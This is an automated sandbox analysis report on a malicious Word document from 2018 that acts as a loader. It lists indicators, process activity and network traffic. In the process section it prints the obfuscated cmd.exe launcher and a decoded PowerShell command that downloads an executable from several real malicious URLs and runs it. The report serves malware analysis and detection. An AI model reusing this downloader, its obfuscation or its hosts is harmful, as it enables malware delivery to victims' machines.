analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

I20587_12052018.doc

Full analysis: https://app.any.run/tasks/5abaf03a-7342-4526-b6bd-f0d06cb79f60
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 06, 2018, 12:30:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 14:33:00 2018, Last Saved Time/Date: Wed Dec 5 14:33:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 17, Security: 0
MD5:

24DD95586AA226893EB31B190C0D4871

SHA1:

3F593E44178D527536321654BC58361FD25F0F4F

SHA256:

22C363631F5EDA7C41E3C8F1452EC58E4E9542E5CB444120253EB191B0204F10

SSDEEP:

1536:Vwt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9uD5C5kVH0PdG:M8GhDS0o9zTGOZD6EbzCd9mWFG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2800)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2800)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3988)
    • Application was dropped or rewritten from another process

      • 674.exe (PID: 316)
      • 674.exe (PID: 2888)
      • archivesymbol.exe (PID: 3676)
      • archivesymbol.exe (PID: 2368)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3392)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3392)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3796)
      • cmd.exe (PID: 2248)
      • cmd.exe (PID: 3988)
      • cmd.exe (PID: 2256)
    • Creates files in the user directory

      • powershell.exe (PID: 3392)
    • Application launched itself

      • cmd.exe (PID: 2256)
      • archivesymbol.exe (PID: 3676)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3392)
      • 674.exe (PID: 316)
    • Starts itself from another location

      • 674.exe (PID: 316)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2800)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 18
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 17
Words: 2
Pages: 1
ModifyDate: 2018:12:05 14:33:00
CreateDate: 2018:12:05 14:33:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
13
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs powershell.exe 674.exe no specs 674.exe archivesymbol.exe no specs archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2800"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\I20587_12052018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3796c:\ZvZIAvmzCjBEfb\jzcdOqjj\DwmMQqivItVPXC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2256CmD /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3916C:\Windows\system32\cmd.exe /S /D /c" echo $RrO='kHi';$qNq=new-object Net.WebClient;$CSZ='http://iptvreseller.com/ZxwE@http://13.127.126.242/cCYYY@http://13.228.100.132/hFKNNaDM@http://ericleventhal.com/vOu@http://www.sdveganecofriendly.com/FB'.Split('@');$nDM='Tnz';$hic = '674';$nup='rfm';$Mqi=$env:temp+'\'+$hic+'.exe';foreach($ksd in $CSZ){try{$qNq.DownloadFile($ksd, $Mqi);$hRi='VLz';If ((Get-Item $Mqi).length -ge 80000) {Invoke-Item $Mqi;$zMz='iau';break;}}catch{}}$dMj='BAZ';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3988C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^|find "Cons"') DO %C -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2248C:\Windows\system32\cmd.exe /c ftype|find "Cons"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2576C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2660find "Cons"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\find.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3392powershell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2888"C:\Users\admin\AppData\Local\Temp\674.exe" C:\Users\admin\AppData\Local\Temp\674.exepowershell.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
Windows
Exit code:
0
Version:
7.6.7601.1
Modules
Images
c:\users\admin\appdata\local\temp\674.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
Total events
1 707
Read events
1 294
Write events
408
Delete events
5

Modification events

(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:g*$
Value:
672A2400F00A0000010000000000000000000000
(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2800) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1300627486
(PID) Process:(2800) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1300627600
(PID) Process:(2800) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1300627601
(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
F00A0000F2167D985F8DD40100000000
(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:-,$
Value:
2D2C2400F00A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:-,$
Value:
2D2C2400F00A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2800) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2800WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR96E7.tmp.cvr
MD5:
SHA256:
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N9Y1I62TFC4CEG1DZY1W.temp
MD5:
SHA256:
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19acb1.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2800WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F171A60E6688BB398358D3C862BB6DE5
SHA256:04475BD18B9D1E8D4891039CA47905A5B841D2B087906011D0DBE632CED34E6A
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
316674.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:8118F4F594DAE97A595FBF6B46859A49
SHA256:27E1FD100E541D069E2A289D7EC5212DC95E0DB32AB693ABD766A34ACB65968F
2800WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$0587_12052018.docpgc
MD5:5261F1F508F4A6C5995166DF9D1C6C0E
SHA256:42F1EEA4583DA53DF3F8B55914C491794053C00CBC91D7FBB6566B41C2CA64E1
3392powershell.exeC:\Users\admin\AppData\Local\Temp\674.exeexecutable
MD5:8118F4F594DAE97A595FBF6B46859A49
SHA256:27E1FD100E541D069E2A289D7EC5212DC95E0DB32AB693ABD766A34ACB65968F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3392
powershell.exe
GET
200
64.15.74.206:80
http://iptvreseller.com/ZxwE/
CA
executable
524 Kb
malicious
3392
powershell.exe
GET
301
64.15.74.206:80
http://iptvreseller.com/ZxwE
CA
html
237 b
malicious
2368
archivesymbol.exe
GET
114.55.106.210:443
http://114.55.106.210:443/
CN
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2368
archivesymbol.exe
114.55.106.210:443
Hangzhou Alibaba Advertising Co.,Ltd.
CN
malicious
3392
powershell.exe
64.15.74.206:80
iptvreseller.com
Netelligent Hosting Services Inc.
CA
suspicious

DNS requests

Domain
IP
Reputation
iptvreseller.com
  • 64.15.74.206
malicious

Threats

PID
Process
Class
Message
3392
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3392
powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
3392
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3392
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3392
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info